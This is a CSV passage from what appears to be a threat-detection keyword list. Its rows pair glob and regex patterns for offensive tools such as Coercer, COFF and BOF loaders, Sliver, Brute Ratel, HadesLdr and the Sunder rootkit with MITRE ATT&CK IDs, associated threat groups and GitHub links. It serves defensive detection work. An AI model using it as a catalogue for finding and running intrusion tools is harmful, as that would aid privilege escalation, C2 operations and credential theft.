"*CoercedPotatoRDLL-main*",".{0,1000}CoercedPotatoRDLL\-main.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","1","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","38591"
"*CoercePotato coerce*",".{0,1000}CoercePotato\scoerce.{0,1000}","offensive_tool_keyword","CoercedPotatoRDLL","Reflective DLL to privesc from NT Service to SYSTEM using SeImpersonateToken privilege","T1055 - T1134 - T1548","TA0004 - TA0003 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/sokaRepo/CoercedPotatoRDLL","1","0","N/A","N/A","10","3","204","31","2023-11-23T18:58:41Z","2023-11-23T13:22:38Z","38592"
"*Coercer coerce*",".{0,1000}Coercer\scoerce.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38593"
"*coercer -d * -u *",".{0,1000}coercer\s\-d\s.{0,1000}\s\-u\s.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","38594"
"*Coercer fuzz*",".{0,1000}Coercer\sfuzz.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38595"
"*Coercer scan*",".{0,1000}Coercer\sscan.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38596"
"*coercer.core*",".{0,1000}coercer\.core.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38597"
"*coercer.methods*",".{0,1000}coercer\.methods.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38598"
"*coercer.models*",".{0,1000}coercer\.models.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38599"
"*coercer.network*",".{0,1000}coercer\.network.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38600"
"*coercer.network.DCERPCSession*",".{0,1000}coercer\.network\.DCERPCSession.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38601"
"*coercer.network.smb*",".{0,1000}coercer\.network\.smb.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38602"
"*Coercer.py *",".{0,1000}Coercer\.py\s.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38603"
"*coercer.structures*",".{0,1000}coercer\.structures.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","0","#content","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38604"
"*coercer/core/loader*",".{0,1000}coercer\/core\/loader.{0,1000}","offensive_tool_keyword","Coercer","A python script to automatically coerce a Windows server to authenticate on an arbitrary machine through many methods.","T1110 - T1021 - T1020","TA0006 - TA0010","N/A","N/A","Exploitation tool","https://github.com/p0dalirius/Coercer","1","1","N/A","N/A","10","10","1945","195","2025-03-21T07:42:42Z","2022-06-30T16:52:33Z","38605"
"*coercer_check*",".{0,1000}coercer_check.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","0","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","38606"
"*coff_definitions.h*",".{0,1000}coff_definitions\.h.{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","N/A","10","10","215","44","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z","38607"
"*COFF_Loader.*",".{0,1000}COFF_Loader\..{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","N/A","10","10","215","44","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z","38608"
"*COFF_PREP_BEACON*",".{0,1000}COFF_PREP_BEACON.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","38609"
"*CoffeeLdr* go *",".{0,1000}CoffeeLdr.{0,1000}\sgo\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","38610"
"*CoffeeLdr.x64.exe*",".{0,1000}CoffeeLdr\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","38611"
"*CoffeeLdr.x86.exe*",".{0,1000}CoffeeLdr\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","38612"
"*COFFELDR_COFFELDR_H*",".{0,1000}COFFELDR_COFFELDR_H.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","38613"
"*coffexec *.o *",".{0,1000}coffexec\s.{0,1000}\.o\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38614"
"*COFFLdr.cpp*",".{0,1000}COFFLdr\.cpp.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","38615"
"*COFFLdr.exe*",".{0,1000}COFFLdr\.exe.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","38616"
"*COFFLoader.*",".{0,1000}COFFLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","38617"
"*COFFLoader.x64.dll*",".{0,1000}COFFLoader\.x64\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38618"
"*COFFLoader.x86.dll*",".{0,1000}COFFLoader\.x86\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38619"
"*COFFLoader64.exe*",".{0,1000}COFFLoader64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","38620"
"*CognisysGroup/HadesLdr*",".{0,1000}CognisysGroup\/HadesLdr.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","38621"
"*coinomi2john.py*",".{0,1000}coinomi2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","38622"
"*coldfusion_dir_traversal_exploit*",".{0,1000}coldfusion_dir_traversal_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38623"
"*Coldroot Sock5 Server*",".{0,1000}Coldroot\sSock5\sServer.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#productname","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","38624"
"*Coldzer0/ReverseSock5Proxy*",".{0,1000}Coldzer0\/ReverseSock5Proxy.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","38625"
"*ColeHouston/Sunder*",".{0,1000}ColeHouston\/Sunder.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","1","N/A","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","38626"
